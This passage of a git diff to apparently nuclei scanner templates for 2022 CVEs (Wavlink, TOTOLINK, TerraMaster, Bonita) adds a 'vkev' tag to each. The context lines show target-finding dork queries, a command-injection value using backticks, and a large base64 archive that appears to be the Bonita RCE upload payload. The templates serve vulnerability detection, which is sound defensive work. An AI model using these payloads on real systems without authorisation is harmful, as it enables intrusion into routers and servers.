cve,cve2022,geoserver,rce,geosolutionsgroup,kev,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 9fef46c2e1c..dba4f6706a8 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -30,7 +30,7 @@ info: vendor: wavlink product: wl-wn535k2 shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,cve,iot,wavlink,router,rce,oast + tags: cve2022,cve,iot,wavlink,router,rce,oast,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index ea024256edf..c9cb2354a3b 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -33,7 +33,7 @@ info: - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,iot,wavlink,router,rce,oast + tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev variables: cmd: "id" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index cc7546c5c63..086186bdf09 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -34,7 +34,7 @@ info: - http.title:"wi-fi app login" fofa-query: title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,iot,wavlink,router,rce,oast + tags: cve,cve2022,iot,wavlink,router,rce,oast,vkev http: - raw: diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index 926427aeba9..63dcf4da1e5 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -30,7 +30,7 @@ info: shodan-query: - "TerraMaster" - terramaster - tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master + tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master,vkev http: - method: GET diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 632a2987c35..812acd2f273 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: totolink product: a950rg_firmware - tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive + tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive,vkev variables: cmd: "`ls>../{{randstr}}`" diff --git a/http/cves/2022/CVE-2022-25237.yaml b/http/cves/2022/CVE-2022-25237.yaml index 8a312e70eab..5e5ec3c39a0 100644 --- a/http/cves/2022/CVE-2022-25237.yaml +++ b/http/cves/2022/CVE-2022-25237.yaml @@ -29,7 +29,7 @@ info: product: bonita shodan-query: 'http.title:"Bonita" || "Server: Bonita"' fofa-query: 'title="Bonita" || header="Server: Bonita"' - tags: cve,cve2022,bonita,auth-bypass,intrusive,file-upload,rce + tags: cve,cve2022,bonita,auth-bypass,intrusive,file-upload,rce,vkev variables: zipdata: "{{base64_decode('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